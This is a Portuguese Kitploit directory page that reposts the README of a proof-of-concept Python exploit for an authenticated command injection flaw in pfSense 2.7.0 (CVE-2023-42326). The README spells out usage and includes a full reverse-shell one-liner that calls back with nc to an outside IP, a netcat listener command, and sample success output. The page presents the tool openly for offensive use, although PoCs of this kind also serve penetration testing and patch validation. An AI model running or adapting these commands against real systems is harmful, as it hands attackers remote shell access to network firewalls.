Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-42326 — Este é um POC simples para demonstrar a vulnerabilidade de injeção de comandos no pfsense 2.7 (CVE-2023-42326) | Kitploit
Ferramentas/GitHubGitHub/bl4ckarch/cve-2023-42326
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubbl4ckarch/cve-2023-42326

CVE-2023-42326

Este é um POC simples para demonstrar a vulnerabilidade de injeção de comandos no pfsense 2.7 (CVE-2023-42326)

Ver Repositório
4há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit de Injeção de Comandos no pfSense 2.7.0 (CVE-2023-42326)

Este script em Python é um exploit de prova de conceito (PoC) para a vulnerabilidade de injeção de comandos (CVE-2023-42326) no pfSense 2.7.0. A vulnerabilidade permite que atacantes autenticados injetem e executem comandos arbitrários por meio dos componentes interfaces_gif_edit.php e interfaces_gre_edit.php.

Funcionalidades

  • Seleção do modo de exploit (gif ou gre) para escolher os componentes vulneráveis.
  • Capacidade de injeção de comandos para executar comandos shell arbitrários.
  • Tratamento de reverse shell via Netcat com gerenciamento automático de threads.
  • Modo de depuração para maior visibilidade dos dados das requisições.

Pré-requisitos

Antes de executar o script, certifique-se de que você tem:

  • Python 3.x instalado no seu sistema.
  • As bibliotecas Python necessárias instaladas:
    root@kitploit:~
    pip install requests beautifulsoup4 rich
    

Uso

Exemplo Básico (Injeção de Comandos)

Este comando injeta um comando shell que cria um reverse shell de volta para sua máquina:

root@kitploit:~
python3 exploit.py -u "admin" -p "pfsense" --mode "gif" -t "http://10.101.1.1" -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.151.1 80 > /tmp/f &"
  • -u: Nome de usuário para o login de administrador do pfSense.
  • -p: Senha para o login de administrador do pfSense.
  • --mode: Modo de exploit (gif ou gre).
  • -t: URL de destino do pfSense.
  • -c: O comando shell a ser injetado.
  • -d: (Opcional) Ativa o modo de depuração para ver os dados brutos da resposta.

Exemplo de Reverse Shell

Certifique-se de ter um listener Netcat em execução na sua máquina:

root@kitploit:~
nc -lvnp 80

Em seguida, execute o script com um comando de reverse shell como este:

root@kitploit:~
python3 exploit.py -u "admin" -p "pfsense" --mode "gif" -t "http://10.101.1.1" -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.151.1 80 > /tmp/f &"  --insecure(for https without valid ssl)

GIFs de Demonstração

  1. Fazendo login no pfSense e explorando a interface GIF

    Demonstração 1 - Interface GIF

  2. Executando um Reverse Shell

    Demonstração 2 - Reverse Shell

Opções do Script

Exemplo de Saída

Quando o exploit é executado com sucesso, você deve ver uma saída semelhante a esta:

root@kitploit:~
██████╗ ███████╗██████╗ ██╗    ██╗███╗   ██╗███╗   ███╗███████╗
██╔══██╗██╔════╝██╔══██╗██║    ██║████╗  ██║████╗ ████║██╔════╝
██████╔╝█████╗  ██████╔╝██║ █╗ ██║██╔██╗ ██║██╔████╔██║█████╗  
██╔═══╝ ██╔══╝  ██╔═══╝ ██║███╗██║██║╚██╗██║██║╚██╔╝██║██╔══╝  
██║     ██║     ██║     ╚███╔███╔╝██║ ╚████║██║ ╚═╝ ██║███████╗
╚═╝     ╚═╝     ╚═╝      ╚══╝╚══╝ ╚═╝  ╚═══╝╚═╝     ╚═╝╚══════╝

Done with ❤️  by @bl4ckarch                                                            
[2024-10-24 03:57:59] [SUCCESS] Target http://10.101.1.1 is reachable
[2024-10-24 03:57:59] [INFO] Fetching CSRF token from: http://10.101.1.1/
[2024-10-24 03:57:59] [SUCCESS] CSRF token extracted successfully
[2024-10-24 03:57:59] [INFO] Sending GIF exploit request to http://10.101.1.1/interfaces_gif_edit.php
[2024-10-24 03:57:59] [SUCCESS] GIF Exploit sent successfully

Notas

  • Requisito de Privilégio: Você deve ter credenciais de administrador válidas para a instância do pfSense.
  • Sistema Alvo: Este exploit é específico para o pfSense 2.7.0.
  • Reverse Shell: Certifique-se de que as configurações do seu firewall permitam conexões de entrada na porta especificada ao configurar um reverse shell.

Modo de Depuração

Se você quiser ver mais detalhes sobre as requisições enviadas, pode ativar o modo de depuração adicionando -d ao seu comando. Isso exibirá os dados da resposta e ajudará você a solucionar quaisquer problemas.

root@kitploit:~
python3 exploit.py -u "admin" -p 'pfsense' --mode 'gif' -t http://10.101.1.1 -c "your_command_here" -d --insecure(for https without valid ssl)

Solução de Problemas

  • Certifique-se de que o sistema alvo está acessível.
  • Verifique novamente as credenciais usadas para o login.
  • Use a flag -d para um registro mais detalhado, se necessário.
Baixar ferramenta
ArgumentDescrição
-uNome de usuário para o login de administrador do pfSense.
-pSenha para o login de administrador do pfSense.
-tURL/IP de destino do pfSense (ex.: http://10.101.1.1).
--modeModo de exploit: gif (para interfaces_gif_edit.php) ou gre.
-cComando a ser injetado no componente vulnerável.
-dOpcional. Ativa o modo de depuração para exibir os dados da resposta.